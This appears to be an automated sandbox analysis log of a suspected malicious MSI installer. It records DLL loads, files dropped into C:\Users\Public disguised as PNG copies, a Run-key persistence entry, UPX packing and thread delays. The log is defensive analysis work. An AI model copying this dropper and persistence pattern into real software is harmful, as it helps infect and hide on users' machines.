Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttpcom.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msdart.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: shutdownext.dllJump to behavior
Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: webview2loader.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: webview2loader.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile written: C:\Users\user\AppData\Local\AdvinstAnalytics\66ac0c9e2ff508bfba878aa5\8.7.6.8\tracking.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: 9rybs.msiStatic file information: File size 12885696 > 1048576
Source: Binary string: wininet.pdb source: shi64B2.tmp.3.dr
Source: Binary string: E:\B\T\d30760c8-f36a-4525-bc41-ffb9fa48b740\build\Win32\Release\mc-webview-cnt.pdb source: PeFIvJrY.exe, PeFIvJrY.exe, 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, PeFIvJrY.exe, 0000000D.00000002.1727643919.00000000003E1000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: C:\JobRelease\win\Release\bin\x86\embeddeduiproxy.pdb source: 9rybs.msi, 495fa1.msi.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: 9rybs.msi, MSI6487.tmp.2.dr, 495fa1.msi.2.dr
Source: Binary string: d3d12.pdbUGP source: shi6530.tmp.3.dr
Source: Binary string: d3d12.pdb source: shi6530.tmp.3.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb\ source: 9rybs.msi, MSI6487.tmp.2.dr, 495fa1.msi.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdbu source: 9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.dr
Source: Binary string: E:\B\T\d30760c8-f36a-4525-bc41-ffb9fa48b740\build\Win32\Release\mc-webview-cnt.pdbJ source: PeFIvJrY.exe, 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, PeFIvJrY.exe, 0000000D.00000002.1727643919.00000000003E1000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: wininet.pdbUGP source: shi64B2.tmp.3.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdb source: 9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: 9rybs.msi, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbg source: 9rybs.msi, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr
Source: shi6530.tmp.3.drStatic PE information: 0x96D7AA59 [Sat Mar 12 16:44:09 2050 UTC]
Source: shi64B2.tmp.3.drStatic PE information: section name: .wpp_sf
Source: shi64B2.tmp.3.drStatic PE information: section name: .didat
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_004441FD push esi; ret 12_2_00444206
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00426443 push ecx; ret 12_2_00426456
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_063237CA push eax; iretd 12_2_063237CD
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_06321205 push edx; retf 12_2_06321206
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_063212BA push edx; retf 12_2_063212BB
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_06321101 push ebx; retf 12_2_06321102
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7003.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6F47.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7033.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI62DE.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\Public\PeFI\vJrY\PeFI.pngJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\Public\PeFI\vJrY\WebView2Loader.dll.png (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F25.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\Public\PeFI\vJrY.pngJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6185.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\shi6530.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\shi64B2.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI635C.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6F17.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\Public\PeFI\vJrY\vJrY.png (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6467.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6487.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\Public\PeFI\vJrY\WebView2Loader.dll (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7003.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6F47.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7033.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI62DE.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F25.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6185.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI635C.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6F17.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6467.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6487.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\Public\PeFI\vJrY\PeFI.pngJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\Public\PeFI\vJrY.pngJump to dropped file
Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PeFIvJrYJump to behavior
Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PeFIvJrYJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0042536C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_0042536C
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeMemory allocated: 25B0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeMemory allocated: 3240000 memory reserve | memory write watchJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeMemory allocated: 5240000 memory reserve | memory write watchJump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0040CB80 NtQuerySystemInformation,NtQuerySystemInformation,SysAllocStringLen,GetCurrentProcessId,GetLastError,NtQueryInformationProcess,NtQueryInformationProcess,CloseHandle,12_2_0040CB80
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599875Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599766Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599656Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599547Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599438Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599313Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599188Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599063Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598952Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598724Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598594Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598484Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598375Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598266Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598156Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598047Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597938Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597813Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597703Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597594Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597469Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597359Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597250Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597141Jump to behavior
